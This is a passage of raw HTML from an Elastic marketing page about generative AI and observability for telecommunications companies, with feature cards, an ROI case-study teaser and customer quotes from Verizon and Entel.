class=""/></div><div class="Spotlight_card-body___rb9E"><p>Comcast transforms customer experiences with Elastic Observability</p><a class="button Spotlight_stretched-link__2M98R btn-tertiary" href="/customers/comcast" tabindex="-1"><span class="jsx-1596590093 btn-copy">Read more</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></div></div></div></div></div></div><div><button class="Items_navigation-items_item__7YSef navigation-item" aria-label="Resources, press down to open menu." aria-expanded="false">Resources<svg class="icons_icon__n3nWe" xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M1.646 4.646a.5.5 0 0 1 .708 0L8 10.293l5.646-5.647a.5.5 0 0 1 .708.708l-6 6a.5.5 0 0 1-.708 0l-6-6a.5.5 0 0 1 0-.708z"></path></svg></button><div class="Dropdown_Dropdown__pUJPf "><div class="Dropdown_DropdownContent__tGePQ"><button class="Dropdown_DropdownClose__wx62b" disabled=""><span class="Dropdown_DropdownClose_text__IoOgP">Close panel</span><svg class="icons_icon__n3nWe" xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none"><path fill-rule="evenodd" clip-rule="evenodd" d="M6.58586 8.00008L0.292969 14.293L1.70718 15.7072L8.00008 9.41429L14.293 15.7072L15.7072 14.293L9.41429 8.00008L15.7072 1.70718L14.293 0.292969L8.00008 6.58586L1.70718 0.292969L0.292969 1.70718L6.58586 8.00008Z"></path></svg></button><div class="Dropdown_DropdownSections__G_B5O"><div class="Items_Section__vJ9lm Items_grid-column__BSkh1"><div class=" Card_nav-card__Gb2bd Card_icon-card__IEL2U "><div class="Card_card-header__dLhyK"><div class="Card_card-image__34JYo"><div class=" Card_icon__VSCRq "><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt96bf0c70d7851e7d/64b6cd8378402d4f9cc28b43/icon-code-self-closing.svg" class="Card_img-fluid__EqrlH" alt=""/></div></div><h2 class="h5">Research</h2></div><div class="Card_card-body__81rqO"><div><p>Stay at the forefront of innovation with technical tips from the experts.</p></div><ul><li><a class="Card_dropdown-link__qZWTu" href="https://www.elastic.co/search-labs" tabindex="-1">Search Labs<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="https://www.elastic.co/security-labs" tabindex="-1">Security Labs<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="https://www.elastic.co/observability-labs" tabindex="-1">Observability Labs<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul></div></div><div class=" Card_nav-card__Gb2bd Card_icon-card__IEL2U "><div class="Card_card-header__dLhyK"><div class="Card_card-image__34JYo"><div class=" Card_icon__VSCRq "><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt96bf0c70d7851e7d/64b6cd8378402d4f9cc28b43/icon-code-self-closing.svg" class="Card_img-fluid__EqrlH" alt=""/></div></div><h2 class="h5">Build</h2></div><div class="Card_card-body__81rqO"><div><p>Code with other developers to create a better Elastic, together.</p></div><ul><li><a class="Card_dropdown-link__qZWTu" href="/community" tabindex="-1">Community<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="https://discuss.elastic.co" tabindex="-1">Forum<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/downloads" tabindex="-1">Downloads<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/guide" tabindex="-1">Documentation<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul></div></div><div class=" Card_nav-card__Gb2bd Card_icon-card__IEL2U "><div class="Card_card-header__dLhyK"><div class="Card_card-image__34JYo"><div class=" Card_icon__VSCRq "><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt96bf0c70d7851e7d/64b6cd8378402d4f9cc28b43/icon-code-self-closing.svg" class="Card_img-fluid__EqrlH" alt=""/></div></div><h2 class="h5">Learn</h2></div><div class="Card_card-body__81rqO"><div><p>Unleash the possibilities of your data and grow your skill set.</p></div><ul><li><a class="Card_dropdown-link__qZWTu" href="/getting-started" tabindex="-1">Getting started<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/learn" tabindex="-1">Elastic resources<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/consulting" tabindex="-1">Consulting services<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/training" tabindex="-1">Trainings &amp; certifications<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul></div></div><div class=" Card_nav-card__Gb2bd Card_icon-card__IEL2U "><div class="Card_card-header__dLhyK"><div class="Card_card-image__34JYo"><div class=" Card_icon__VSCRq "><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt96bf0c70d7851e7d/64b6cd8378402d4f9cc28b43/icon-code-self-closing.svg" class="Card_img-fluid__EqrlH" alt=""/></div></div><h2 class="h5">Connect</h2></div><div class="Card_card-body__81rqO"><div><p>Keep informed about the latest tech and news from Elastic.</p></div><ul><li><a class="Card_dropdown-link__qZWTu" href="/blog" tabindex="-1">Blog<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/events" tabindex="-1">Events<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul><hr class="Card_nav-divider__yt_19"/><div><p>Have questions?</p></div><ul><li><a class="Card_dropdown-link__qZWTu" href="/contact?storm=global-header-en" tabindex="-1">Contact sales<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/support" tabindex="-1">Get support<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul></div></div></div></div></div></div></div><a class="Items_navigation-items_item__7YSef navigation-item" href="/pricing">Pricing</a><a class="Items_navigation-items_item__7YSef navigation-item" href="https://www.elastic.co/docs">Docs</a></nav></div></div></div></div></div><div class="newNav Navigation_navigation__fV7hy" data-theme="light"><div class="Masthead_masthead__BdzP7" data-theme="light"><div data-component="Container" class="Container_container__MtYF0 Container_container--gutter-sm__7pTAU Container_container--width-lg___3B8A"><div class="Masthead_masthead__content__9ozlx"><div class="Marquee_marquee__GjfGB"><p class="Marquee_marquee__tag__6fqKH"><svg data-component="Icon" class="Icon_icon__dSH3_" width="10" height="10" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="none"><path fill="#DD0A73" d="M10 5a5 5 0 0 0-5 5 5 5 0 0 0-5-5 5 5 0 0 0 5-5 5 5 0 0 0 5 5"></path></svg>New</p><a href="https://www.elastic.co/portfolio/operationalizing-generative-ai-strategic-guide">Read more</a></div><div class="Masthead_masthead__links__FIs_o"><a href="https://www.elastic.co/about">About us</a><a href="https://www.elastic.co/partners">Partners</a><a href="https://www.elastic.co/support">Support</a>|<a href="https://cloud.elastic.co/login"><svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor" aria-hidden="true" data-slot="icon" height="16" width="16"><path stroke-linecap="round" stroke-linejoin="round" d="M15.75 6a3.75 3.75 0 1 1-7.5 0 3.75 3.75 0 0 1 7.5 0ZM4.501 20.118a7.5 7.5 0 0 1 14.998 0A17.933 17.933 0 0 1 12 21.75c-2.676 0-5.216-.584-7.499-1.632Z"></path></svg>Login</a></div></div></div></div><div data-component="Container" class="Container_container__MtYF0 Container_container--gutter-sm__7pTAU Container_container--width-lg___3B8A Navigation_navigation__container__tRrDy"><a class="Logo_logo__dlgEX" href="https://www.elastic.co/"><svg width="117" height="40" viewBox="0 0 117 40" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0_3472_2853)"><path d="M40.1527 20.9588C40.1527 17.5986 38.0653 14.6457 34.9257 13.5087C35.0615 12.7959 35.1294 12.0832 35.1294 11.3534C35.1294 5.09122 30.0382 0 23.7929 0C20.1273 0 16.7331 1.74799 14.5948 4.70089C13.5426 3.8863 12.2529 3.44506 10.9122 3.44506C7.58591 3.44506 4.88757 6.14341 4.88757 9.46967C4.88757 10.1994 5.02333 10.9122 5.26092 11.574C2.13831 12.6941 0 15.6979 0 19.0412C0 22.4183 2.10437 25.3712 5.24395 26.5083C5.10819 27.2041 5.0403 27.9338 5.0403 28.6636C5.0403 34.9088 10.1145 39.983 16.3598 39.983C20.0255 39.983 23.4196 38.2181 25.5409 35.2652C26.5931 36.0967 27.8829 36.5549 29.2236 36.5549C32.5498 36.5549 35.2482 33.8566 35.2482 30.5303C35.2482 29.8006 35.1124 29.0878 34.8748 28.426C37.9974 27.3059 40.1527 24.3021 40.1527 20.9588Z"></path><path d="M15.7826 17.2248L24.5735 21.2299L33.4322 13.4573C33.568 12.8124 33.6189 12.1845 33.6189 11.5056C33.6189 6.04106 29.1725 1.59473 23.708 1.59473C20.4326 1.59473 17.3949 3.20695 15.5451 5.90529L14.0686 13.5591L15.7826 17.2248Z"></path><path d="M6.68643 26.5253C6.55067 27.1702 6.49976 27.832 6.49976 28.5109C6.49976 33.9924 10.9631 38.4387 16.4446 38.4387C19.7369 38.4387 22.8086 36.8095 24.6584 34.0942L26.1179 26.4744L24.1663 22.7408L15.3415 18.7188L6.68643 26.5253Z"></path><path d="M6.63518 11.3195L12.6598 12.745L13.9835 5.90581C13.1689 5.27789 12.1507 4.93848 11.0985 4.93848C8.48499 4.93848 6.34668 7.05982 6.34668 9.69028C6.34668 10.2503 6.4485 10.8103 6.63518 11.3195Z"></path><path d="M6.11005 12.7617C3.42867 13.6442 1.54492 16.2237 1.54492 19.0579C1.54492 21.8241 3.25896 24.2848 5.82155 25.2691L14.273 17.6323L12.7286 14.323L6.11005 12.7617Z"></path><path d="M26.186 34.0937C27.0176 34.7216 28.0189 35.078 29.0541 35.078C31.6676 35.078 33.8059 32.9567 33.8059 30.3262C33.8059 29.7492 33.7041 29.1892 33.5174 28.6801L27.5098 27.2715L26.186 34.0937Z"></path><path d="M27.4074 25.6936L34.026 27.2379C36.7243 26.3554 38.5911 23.7759 38.5911 20.9248C38.5911 18.1755 36.8771 15.6978 34.3145 14.7305L25.6594 22.3164L27.4074 25.6936Z"></path><path d="M56.1395 28.0863L56.9371 28.0014L56.988 29.6306C54.8836 29.9191 53.0847 30.0718 51.5913 30.0718C49.6057 30.0718 48.1971 29.4948 47.3656 28.3408C46.534 27.1868 46.1267 25.3879 46.1267 22.9611C46.1267 18.1075 48.0614 15.6807 51.9137 15.6807C53.7805 15.6807 55.1721 16.2068 56.0885 17.242C57.005 18.2772 57.4632 19.9233 57.4632 22.1465L57.3444 23.7248H48.2141C48.2141 25.2521 48.4856 26.3892 49.0457 27.1189C49.6057 27.8487 50.5561 28.222 51.9307 28.222C53.3223 28.256 54.7139 28.2051 56.1395 28.0863ZM55.3927 22.0956C55.3927 20.3985 55.1212 19.1936 54.5781 18.4978C54.0351 17.802 53.1526 17.4456 51.9307 17.4456C50.7088 17.4456 49.7754 17.819 49.1645 18.5487C48.5535 19.2785 48.2311 20.4664 48.2141 22.0956H55.3927Z"></path><path d="M60.3481 29.8177V9.96191H62.4186V29.8177H60.3481Z"></path><path d="M75.5031 20.1615V26.9668C75.5031 27.6626 77.2171 27.7984 77.2171 27.7984L77.1153 29.6312C75.6558 29.6312 74.4509 29.75 73.7212 29.0542C72.058 29.7839 70.4119 30.0894 68.7487 30.0894C67.4759 30.0894 66.5086 29.733 65.8467 29.0033C65.1849 28.2905 64.8455 27.2553 64.8455 25.8977C64.8455 24.557 65.1849 23.5557 65.8637 22.9278C66.5425 22.2999 67.6117 21.8926 69.0712 21.7568L73.4157 21.3495V20.1615C73.4157 19.2282 73.212 18.5493 72.8047 18.142C72.3974 17.7347 71.8374 17.5311 71.1416 17.5311H65.694V15.6982H71.0058C72.5671 15.6982 73.7042 16.0546 74.417 16.7844C75.1467 17.4971 75.5031 18.6342 75.5031 20.1615ZM66.9838 25.7958C66.9838 27.4929 67.6796 28.3414 69.0881 28.3414C70.344 28.3414 71.5828 28.1378 72.7878 27.7135L73.4157 27.4929V22.9278L69.3257 23.3181C68.4942 23.386 67.9002 23.6236 67.5268 24.0309C67.1535 24.4382 66.9838 25.0321 66.9838 25.7958Z"></path><path d="M83.5981 17.5477C81.5955 17.5477 80.5773 18.2435 80.5773 19.6521C80.5773 20.2969 80.8149 20.7552 81.2731 21.0267C81.7313 21.2982 82.7835 21.5697 84.4297 21.8582C86.0758 22.1467 87.2298 22.5371 87.9087 23.0632C88.5875 23.5723 88.9269 24.5396 88.9269 25.9652C88.9269 27.3907 88.4687 28.4259 87.5523 29.0878C86.6359 29.7496 85.3121 30.089 83.5472 30.089C82.4101 30.089 78.5917 29.6648 78.5917 29.6648L78.7105 27.8659C80.8997 28.0695 82.495 28.2392 83.5641 28.2392C84.6333 28.2392 85.4479 28.0695 86.0079 27.7301C86.568 27.3907 86.8565 26.8137 86.8565 26.0161C86.8565 25.2184 86.6189 24.6754 86.1437 24.3869C85.6685 24.0984 84.6163 23.8269 82.9871 23.5723C81.3579 23.3177 80.2039 22.9444 79.5251 22.4353C78.8463 21.9431 78.5068 21.0097 78.5068 19.669C78.5068 18.3283 78.982 17.3271 79.9324 16.6822C80.8827 16.0373 82.0707 15.7148 83.4793 15.7148C84.5994 15.7148 88.5026 16.0033 88.5026 16.0033V17.8192C86.4492 17.7004 84.7691 17.5477 83.5981 17.5477Z"></path><path d="M98.9392 17.7857H94.5438V24.4043C94.5438 25.9826 94.6626 27.0348 94.8832 27.5269C95.1208 28.0191 95.6639 28.2736 96.5294 28.2736L98.9901 28.1039L99.1259 29.818C97.887 30.0216 96.9536 30.1234 96.3087 30.1234C94.8662 30.1234 93.8819 29.767 93.3219 29.0712C92.7619 28.3754 92.4903 27.0348 92.4903 25.0662V17.7857H90.5217V15.9868H92.4903V11.7441H94.5438V15.9699H98.9392V17.7857Z"></path><path d="M101.824 12.847V10.4541H103.895V12.8639L101.824 12.847ZM101.824 29.8177V15.9866H103.895V29.8177H101.824Z"></path><path d="M112.889 15.6982C113.5 15.6982 114.535 15.817 115.995 16.0377L116.656 16.1225L116.572 17.8026C115.095 17.6329 114.009 17.5481 113.313 17.5481C111.752 17.5481 110.683 17.9214 110.123 18.6681C109.563 19.4148 109.274 20.8064 109.274 22.8259C109.274 24.8455 109.529 26.254 110.055 27.0517C110.581 27.8493 111.667 28.2396 113.33 28.2396L116.589 27.9851L116.673 29.6991C114.959 29.9537 113.67 30.0894 112.821 30.0894C110.666 30.0894 109.172 29.5294 108.358 28.4263C107.543 27.3232 107.119 25.4564 107.119 22.8259C107.119 20.1955 107.56 18.3457 108.443 17.2935C109.342 16.2413 110.819 15.6982 112.889 15.6982Z"></path></g><defs><clipPath id="clip0_3472_2853"><rect width="116.674" height="40" fill="white"></rect></clipPath></defs></svg></a><nav aria-label="Main" data-orientation="horizontal" dir="ltr" class="NavDropdown_navDropdown__agBDs"><div class="NavDropdown_navDropdown__overlay__p8ZvY"></div><div style="position:relative"><ul data-orientation="horizontal" class="NavDropdown_navDropdown__list__qy1xV" dir="ltr"><li><button id="-trigger-LEGACY_REACT_AUTO_VALUE" data-state="closed" aria-expanded="false" aria-controls="-content-LEGACY_REACT_AUTO_VALUE" class="NavDropdown_navDropdown__trigger__Jj_Al" data-radix-collection-item="">Products</button></li><li><button id="-trigger-LEGACY_REACT_AUTO_VALUE" data-state="closed" aria-expanded="false" aria-controls="-content-LEGACY_REACT_AUTO_VALUE" class="NavDropdown_navDropdown__trigger__Jj_Al" data-radix-collection-item="">Solutions</button></li><li><button id="-trigger-LEGACY_REACT_AUTO_VALUE" data-state="closed" aria-expanded="false" aria-controls="-content-LEGACY_REACT_AUTO_VALUE" class="NavDropdown_navDropdown__trigger__Jj_Al" data-radix-collection-item="">Why Elastic?</button></li><li><button id="-trigger-LEGACY_REACT_AUTO_VALUE" data-state="closed" aria-expanded="false" aria-controls="-content-LEGACY_REACT_AUTO_VALUE" class="NavDropdown_navDropdown__trigger__Jj_Al" data-radix-collection-item="">Resources</button></li><a class="NavDropdown_navDropdown__trigger__Jj_Al" href="https://www.elastic.co/pricing">Pricing</a><a class="NavDropdown_navDropdown__trigger__Jj_Al" href="https://www.elastic.co/docs">Docs</a></ul></div></nav><div class="Navigation_navigation__actions__TEAR7"><div class="SearchInput_searchInput__ynnEJ"><div class="SearchInput_searchInput__glow__irOA9"></div><button class="SearchInput_searchInput__button__aVQ2G" type="button"><svg data-component="Icon" class="SearchInput_searchInput__icon__gWuuf Icon_icon__dSH3_" width="22" height="21" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="none"><path fill="currentColor" fill-rule="evenodd" d="M1.934 8.933a5.75 5.75 0 0 1 8.628 7.567l2.969 2.97a.75.75 0 0 1-1.06 1.06L9.5 17.56a5.75 5.75 0 0 1-7.567-8.627M6 8.75a4.25 4.25 0 1 0 0 8.5 4.25 4.25 0 0 0 0-8.5" clip-rule="evenodd"></path><path fill="currentColor" d="M18 4a4 4 0 0 0-4 4 4 4 0 0 0-4-4 4 4 0 0 0 4-4 4 4 0 0 0 4 4M22 10a3 3 0 0 0-3 3 3 3 0 0 0-3-3 3 3 0 0 0 3-3 3 3 0 0 0 3 3"></path></svg><span>Search</span></button></div><button data-component="Button" class="Button_button__iy3n8 Button_button--primary__Y48gQ Button_button--md__S_OuH" type="button"><span>Start free trial</span></button><button data-component="Button" class="Button_button__iy3n8 Button_button--secondary__BjlK0 Button_button--md__S_OuH" type="button"><span>Contact sales</span></button></div></div></div><div class="newNav Navigation_navigation__placeholder__Bm_GK"></div></header><main id="main-content" role="main"><div class="jsx-579451128 default-detail"><link rel="stylesheet" href="/static-res/styles/css/vendors/prettify.css" class="jsx-579451128"/><script type="text/javascript" src="/static-res/js/prettify.js" class="jsx-579451128"></script><section aria-labelledby="generative-ai-for-telco" data-component-theme="" class="jsx-3636536621 Hero_hero__iEZMX position-relative Hero_twoColumn___DJDO hero"><div class=""><div class="Patterns_patterns__3u_in container z-0"><div class="Patterns_left__g_wcp"><img src="/static-res/images/hero/generic-c-light-left.svg" alt=""/></div><div class="Patterns_right__kW4Ma"><img src="/static-res/images/hero/generic-d-light-right.svg" alt=""/></div></div></div><div class=""><div class="Hero_heroContent__S5fut justify-content-between"><div class="container"><div class="layout layout-06"></div><div class="row"><div class="col-12 col-sm-8 offset-sm-2 col-lg-5 offset-lg-0 d-flex"><div class="Hero_content__VSxmz align-self-center"><h2 class="topic-heading">Telecommunications</h2><div class="jsx-1955866259 title-wrapper"><h1 tag="H1" id="generative-ai-for-telco" class="jsx-1955866259 h2">Generative AI for telco</h1></div><div class="Hero_description__nrqhU paragraph-large"><p>Generative AI presents an opportunity for telco organizations to drive AI-powered customer and employee experiences. Explore how telco organizations can leverage generative AI and how to get started.</p></div><div class="Hero_ctaList__efelZ mt-5"><div class="Hero_cta__zIL_f"><a class="button btn-primary" href="#the-power-of-generative-ai-for-telco"><span class="jsx-1596590093 btn-copy">Watch video</span></a></div><div class="Hero_cta__zIL_f"><a class="button btn-tertiary" href="/telecommunications/unlocking-the-power-of-generative-ai"><span class="jsx-1596590093 btn-copy">Download brief</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></div><div class="col-12 col-sm-10 offset-sm-1 col-lg-6 offset-lg-1"><div class="Hero_asset__rLCmZ"><figure class="jsx-89852744 vidyard-embed shadow-dark "><img src="https://play.vidyard.com/jPKKP8TVkRWokQd7ex9XpE.jpg" data-uuid="jPKKP8TVkRWokQd7ex9XpE" data-v="4" data-chapter="1" data-type="inline" data-referring_url="" disablepictureinpicture="" data-autoplay="0" data-hidden_controls="1" data-muted="1" data-loop="1" data-disable_analytics="1" alt="Video thumbnail" class="jsx-89852744 vidyard-player-embed "/></figure></div></div></div><div class="layout layout-05"></div></div></div></div></section><div class="layout layout-07"></div><div style="border-radius:" data-component-theme="" class="jsx-2381115616 illustration-icon-grid-container"><div class="jsx-1383953900 title-text-one-column"><div class="jsx-1383953900 container"><div class="col-md-8 offset-md-2 text-center"><h2 class="topic-heading">Break down network and business silos</h2><div class="jsx-1955866259 title-wrapper"><h2 tag="H2" id="reimagine-telecom-with-unified-visibility" class="jsx-1955866259 h3">Reimagine telecom with unified visibility</h2></div><div class="title-text-desc paragraph-large"><p>Leading telecom providers worldwide trust Elastic to expand their digital services footprint by helping them deliver the next-gen telecom experiences. With proven solutions built on a single search intelligence platform, Elastic enables actionable insights into networks, support systems, and customer behavior that align with business objectives.</p></div><div class="title-text-footer"><div class="cta-group align-items-center justify-content-center text-center"><div><a class="button mt-4 btn-tertiary" href="/industries/telecommunications/enable-real-time-insights-at-telco-scale"><span class="jsx-1596590093 btn-copy">Download the guide</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></div></div></div><div class="jsx-2381115616 container"><div class="layout layout-05"></div><ul class="illustration-icon-grid-items illustration-icon-grid-3x1"><li class="jsx-802606770 illustration-icon-grid-item one-column grid-image-left"><div class="illustration-icon-grid-item-main"><div class="illustration-icon-grid-item-top grid-image-left"><div><div class="grid-image"><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt80f78dbbb85f42a0/6492440bb9a07659f19282d1/illustration-people-channels-128.svg" class="image-xsmall" alt=""/></div></div><div></div><div></div><div></div></div><div class="illustration-icon-grid-item-content"><div></div><div><div class="jsx-1955866259 title-wrapper"><h3 tag="H3" id="manage-distributed-networks" class="jsx-1955866259 h5">Manage distributed networks</h3></div></div><div><div class="paragraph paragraph-medium"><p>Hear from the Elastic industry team on how telecom companies are managing their core networks with Elastic.</p></div></div><div></div></div></div><div class="illustration-icon-grid-item-footer"><div></div><div></div><div></div><div><div class="d-flex flex-column justify-content-start text-start"><a class="button btn-tertiary" href="/elasticon/archive/2021/global/enable-real-time-insights-at-scale-for-telco-to-solve"><span class="jsx-1596590093 btn-copy">Learn more</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></li><li class="jsx-802606770 illustration-icon-grid-item one-column grid-image-left"><div class="illustration-icon-grid-item-main"><div class="illustration-icon-grid-item-top grid-image-left"><div><div class="grid-image"><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7e1a162341d630e8/6540a0b262f244001b7d9257/illustration-cloud-services-security-posture-target-128.svg" class="image-xsmall" alt=""/></div></div><div></div><div></div><div></div></div><div class="illustration-icon-grid-item-content"><div></div><div><div class="jsx-1955866259 title-wrapper"><h3 tag="H3" id="scale-efficiently-in-the-cloud" class="jsx-1955866259 h5">Scale efficiently in the cloud</h3></div></div><div><div class="paragraph paragraph-medium"><p>Find out how a leading telecom provider realized a <strong>283% ROI</strong> with a payback period of <strong>1.7 years</strong> after deploying Elastic Cloud. </p></div></div><div></div></div></div><div class="illustration-icon-grid-item-footer"><div></div><div></div><div></div><div><div class="d-flex flex-column justify-content-start text-start"><a class="button btn-tertiary" href="/global-telecom-provider-realized-283-percent-roi-with-elastic-cloud"><span class="jsx-1596590093 btn-copy">Learn more</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></li><li class="jsx-802606770 illustration-icon-grid-item one-column grid-image-left"><div class="illustration-icon-grid-item-main"><div class="illustration-icon-grid-item-top grid-image-left"><div><div class="grid-image"><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9d6b5f42b0641e4a/6492528b0f2d9b16c2ed693a/illustration-security-lock-128.svg" class="image-xsmall" alt=""/></div></div><div></div><div></div><div></div></div><div class="illustration-icon-grid-item-content"><div></div><div><div class="jsx-1955866259 title-wrapper"><h3 tag="H3" id="prevent-frauds-and-cyber-attacks" class="jsx-1955866259 h5">Prevent frauds and cyber attacks</h3></div></div><div><div class="paragraph paragraph-medium"><p>Download the total economic impact study from Forrester Consulting, which spotlights the combined benefits of protecting and observing applications and services. </p></div></div><div></div></div></div><div class="illustration-icon-grid-item-footer"><div></div><div></div><div></div><div><div class="d-flex flex-column justify-content-start text-start"><a class="button btn-tertiary" href="/elastic-stack/2021-total-economic-impact-elastic-observability-security?elektra=products-security-siem&amp;storm=cta1&amp;rogue=forrester-tei-gic"><span class="jsx-1596590093 btn-copy">Learn more</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></li></ul></div></div><div class="layout layout-07"></div><section class="QuotesCarousel_quotesCarousel__toTDc"><div class="QuotesCarousel_quotesCarouselSection__8HAJ5 pt-9"><div class="container"><div class="row"><div class="col-12 col-md-10 offset-md-1"><div class="slick-slider slick-initialized" dir="ltr"><button type="button" data-role="none" class="slick-arrow slick-prev" style="display:block"> <!-- -->Previous</button><div class="slick-list"><div class="slick-track" style="width:900%;left:-100%"><div data-index="0" class="slick-slide slick-active slick-current" tabindex="-1" aria-hidden="false" style="outline:none;width:11.11111111111111%;position:relative;left:0;opacity:1;transition:opacity 500ms ease, visibility 500ms ease"><div><div tabindex="-1" style="width:100%;display:inline-block"><div><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/bltd5a35b9717d7a1af/5e05050d12af1140b8e779c9/icon-quote-64-pink.svg" alt="icon-quote" class="QuotesCarousel_logo64__pmSml"/><div class="QuotesCarousel_quoteContent__Wc_px"><p class="QuotesCarousel_paragraph__eE7i0">When we started using Elasticsearch, we recognized its promise. We could see that this would be part of our future. Our engineers were able to get the full stack up and running in just thirty minutes. It was simple. It was well thought out.</p></div><div class="mt-6 d-flex justify-content-center flex-wrap"><div class="jsx-1955866259 title-wrapper"><h6 tag="H6" id="" class="jsx-1955866259 "><span class="QuotesCarousel_quoteHyphen__NF5TT">Krishna Reddy<!-- -->, <!-- -->Director, Verizon</span></h6></div></div><div class="mb-2 pt-4 QuotesCarousel_quotesCta__bkVZc"></div></div></div></div></div><div data-index="1" class="slick-slide" tabindex="-1" aria-hidden="true" style="outline:none;width:11.11111111111111%;position:relative;left:-11px;opacity:0;transition:opacity 500ms ease, visibility 500ms ease"><div><div tabindex="-1" style="width:100%;display:inline-block"><div><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/bltd5a35b9717d7a1af/5e05050d12af1140b8e779c9/icon-quote-64-pink.svg" alt="icon-quote" class="QuotesCarousel_logo64__pmSml"/><div class="QuotesCarousel_quoteContent__Wc_px"><p class="QuotesCarousel_paragraph__eE7i0">The Elastic Stack represents the backbone of the digital transformation project to give us visibility to Entel as a whole.</p></div><div class="mt-6 d-flex justify-content-center 